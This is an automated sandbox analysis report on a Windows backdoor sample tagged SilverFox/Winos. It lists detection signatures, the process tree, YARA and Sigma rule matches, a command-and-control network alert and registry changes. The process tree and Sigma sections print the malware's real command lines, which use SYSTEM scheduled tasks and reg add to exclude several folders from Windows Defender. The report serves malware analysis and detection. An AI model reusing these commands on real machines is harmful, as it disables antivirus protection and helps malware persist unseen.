Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2873466535874-68348745.02.exe

Overview

General Information

Sample name:2873466535874-68348745.02.exe
Analysis ID:1587272
MD5:988a0f183ed996dbfcbf7a7a9febd75b
SHA1:8cdba1b439da0c0213a0c63c4a9a3128a365c429
SHA256:0daf81269428bfae28ae44dd57cda9903b93136b97d40552034e715bdb75a153
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Creates an undocumented autostart registry key
Drops PE files to the document folder of the user
Drops password protected ZIP file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Switches to a custom stack to bypass stack traces
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 9afrYB.exe (PID: 5688 cmdline: C:\Users\user\Documents\9afrYB.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • 9afrYB.exe (PID: 1600 cmdline: C:\Users\user\Documents\9afrYB.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • 9afrYB.exe (PID: 6764 cmdline: C:\Users\user\Documents\9afrYB.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
    • cmd.exe (PID: 4676 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3780 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 4696 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1308 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 1408 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6104 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2292 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1524 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 1812 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1972 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 4612 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6188 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 1712 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1048 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2616 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 4432 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • bmaosk.exe (PID: 1220 cmdline: "C:\Program Files (x86)\bmaosk\bmaosk.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
      • cmd.exe (PID: 3568 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 5phaM8.exe (PID: 6388 cmdline: "C:\Program Files (x86)\5phaM8\5phaM8.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
    • bmaosk.exe (PID: 1812 cmdline: "C:\Program Files (x86)\bmaosk\bmaosk.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • cmd.exe (PID: 5704 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 3276 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 1080 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 3944 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 760 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 6056 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 4524 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 5040 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • bmaosk.exe (PID: 2800 cmdline: "C:\Program Files (x86)\bmaosk\bmaosk.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • 5r1Aib1.exe (PID: 2888 cmdline: "C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • 5r1Aib1.exe (PID: 4296 cmdline: "C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • bmaosk.exe (PID: 3840 cmdline: "C:\Program Files (x86)\bmaosk\bmaosk.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • 5r1Aib1.exe (PID: 6500 cmdline: "C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • bmaosk.exe (PID: 5448 cmdline: "C:\Program Files (x86)\bmaosk\bmaosk.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • 5r1Aib1.exe (PID: 3056 cmdline: "C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • bmaosk.exe (PID: 5364 cmdline: "C:\Program Files (x86)\bmaosk\bmaosk.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • kfbe6yYK.exe (PID: 5784 cmdline: C:\ProgramData\kfbe6yYK.exe MD5: ADFAC62AE0815EEFB205D73D9FEAC532)
  • 9eYJWFQF.exe (PID: 6424 cmdline: C:\ProgramData\EsnjLDMo\9eYJWFQF.exe MD5: 66D1818C27C67B8BA01FE919E8ADCA5A)
  • 5r1Aib1.exe (PID: 5404 cmdline: "C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Unpacked PEs

SourceRuleDescriptionAuthorStrings
4.2.9afrYB.exe.2910000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
3.2.9afrYB.exe.2820000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath

Sigma Signatures

System Summary

barindex
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\9afrYB.exe, ParentImage: C:\Users\user\Documents\9afrYB.exe, ParentProcessId: 6764, ParentProcessName: 9afrYB.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 4676, ProcessName: cmd.exe
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\9afrYB.exe, ParentImage: C:\Users\user\Documents\9afrYB.exe, ParentProcessId: 6764, ParentProcessName: 9afrYB.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 4676, ProcessName: cmd.exe
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Source: Process startedAuthor: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5704, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 3276, ProcessName: reg.exe
Sigma detected: Windows Defender Exclusions Added - Registry
Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 3276, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-10T02:27:47.526813+010028529011Malware Command and Control Activity Detected192.168.2.5499918.217.59.2228917TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 2873466535874-68348745.02.exeAvira: detected
Antivirus detection for dropped file
Source: C:\ProgramData\kfbe6yYK.exeAvira: detection malicious, Label: HEUR/AGEN.1315326
Source: C:\Program Files (x86)\5phaM8\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\5phaM8\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\Z93E12i3\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
Multi AV Scanner detection for submitted file
Source: 2873466535874-68348745.02.exeVirustotal: Detection: 13%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\ProgramData\kfbe6yYK.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\5phaM8\tbcore3U.dllJoe Sandbox ML: detected
Source: C:\Program Files (x86)\5phaM8\tbcore3U.dllJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Z93E12i3\tbcore3U.dllJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 39.103.20.42:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.5:49982 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.2.5:60499 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.2.5:60503 version: TLS 1.2
Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 2873466535874-68348745.02.exe
Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 9afrYB.exe, 00000006.00000003.2811489429.0000000003E1C000.00000004.00000020.00020000.00000000.sdmp, bmaosk.exe, 00000027.00000000.3016810751.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, bmaosk.exe, 00000028.00000000.3034034590.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, bmaosk.exe, 00000028.00000002.3042146850.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, 5r1Aib1.exe, 00000029.00000002.3043541318.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, 5r1Aib1.exe, 00000029.00000000.3037274563.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, 5r1Aib1.exe, 0000002C.00000002.3060759562.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, 5r1Aib1.exe, 0000002C.00000000.3047361403.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, bmaosk.exe, 0000002D.00000002.3061535825.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, bmaosk.exe, 0000002D.00000000.3048615079.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, 5r1Aib1.exe, 0000002E.00000002.3218163778.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, 5r1Aib1.exe, 0000002E.00000000.3207402561.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, bmaosk.exe, 0000002F.00000002.3221190179.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, bmaosk.exe, 0000002F.00000000.3214222156.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, 5phaM8.exe, 00000030.00000002.3299939275.0000000000928000.00000002.00000001.01000000.0000000E.sdmp, 5phaM8.exe, 00000030.00000000.3291344971.0000000000928000.00000002.00000001.01000000.0000000E.sdmp, 5r1Aib1.exe, 00000031.00000000.3799139729.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, 5r1Aib1.exe, 00000031.00000002.3818367743.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, bmaosk.exe, 00000032.00000002.3821962942.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, bmaosk.exe, 00000032.00000000.3804152957.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, 5r1Aib1.exe, 00000035.00000000.4397756084.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, 5r1Aib1.exe, 00000035.00000002.4421264585.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, bmaosk.exe, 00000036.00000002.4423249567.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, bmaosk.exe, 00000036.00000000.4405674251.0000000000338000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 9afrYB.exe, 00000003.00000000.2352915328.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 9afrYB.exe, 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 9afrYB.exe, 00000004.00000002.2375684040.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 9afrYB.exe, 00000004.00000000.2362949280.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 9afrYB.exe, 00000006.00000000.2613396052.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 9afrYB.exe.0.dr

Change of critical system settings

barindex
Adds extensions / path to Windows Defender exclusion list (Registry)
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramDataJump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\UsersJump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)Jump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\DocumentsJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
